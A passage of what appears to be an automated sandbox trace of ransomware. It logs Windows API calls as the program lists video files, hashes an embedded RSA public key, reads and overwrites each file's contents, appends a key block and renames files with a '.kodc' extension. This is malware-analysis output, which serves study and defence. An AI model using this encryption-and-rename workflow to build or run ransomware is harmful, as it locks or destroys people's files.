Size=0x80) returned 0x693378 [0100.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0100.635] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.635] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAmJunRYy2WXWqujiyt.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xamjunryy2wxwqujiyt.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XAmJunRYy2WXWqujiyt.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xamjunryy2wxwqujiyt.mkv.kodc")) returned 1 [0100.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0100.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.636] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.638] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceea8e80, ftCreationTime.dwHighDateTime=0x1d5b776, ftLastAccessTime.dwLowDateTime=0xbacfaae0, ftLastAccessTime.dwHighDateTime=0x1d5bea9, ftLastWriteTime.dwLowDateTime=0xbacfaae0, ftLastWriteTime.dwHighDateTime=0x1d5bea9, nFileSizeHigh=0x0, nFileSizeLow=0xe252, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XHearxWNtiYbMgqS bX.flv", cAlternateFileName="XHEARX~1.FLV")) returned 1 [0100.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.638] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XHearxWNtiYbMgqS bX.flv") returned=".flv" [0100.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\XHearxWNtiYbMgqS bX.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xhearxwntiybmgqs bx.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.638] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=57938) returned 1 [0100.639] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.642] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe22c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.643] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.644] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.644] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xe252, lpOverlapped=0x0) returned 1 [0100.644] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.645] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.645] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.646] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.646] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.646] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.646] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.646] GetLastError () returned 0x0 [0100.646] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.646] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.646] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.646] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.646] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.646] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.646] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.646] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xe250) returned 0x9bb8968 [0100.647] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.647] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5860 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d70 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb58a8 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7d88 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.647] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.647] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7dd0 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7db8 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.648] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.648] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.649] GetCurrentThreadId () returned 0x42c [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7228 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.649] GetCurrentThreadId () returned 0x42c [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.649] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0100.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7dd0 [0100.650] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7da0 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7de8 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7db8 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7db8 | out: hHeap=0x630000) returned 1 [0100.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.652] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7de8 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7dd0 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7da0 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7d88 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb58a8 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.653] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.653] WriteFile (in: hFile=0x5cc, lpBuffer=0x9bb8968*, nNumberOfBytesToWrite=0xe24d, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9bb8968*, lpNumberOfBytesWritten=0x9e2fb14*=0xe24d, lpOverlapped=0x0) returned 1 [0100.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8968 | out: hHeap=0x630000) returned 1 [0100.654] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xe252, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.654] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.654] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.654] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.654] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.654] 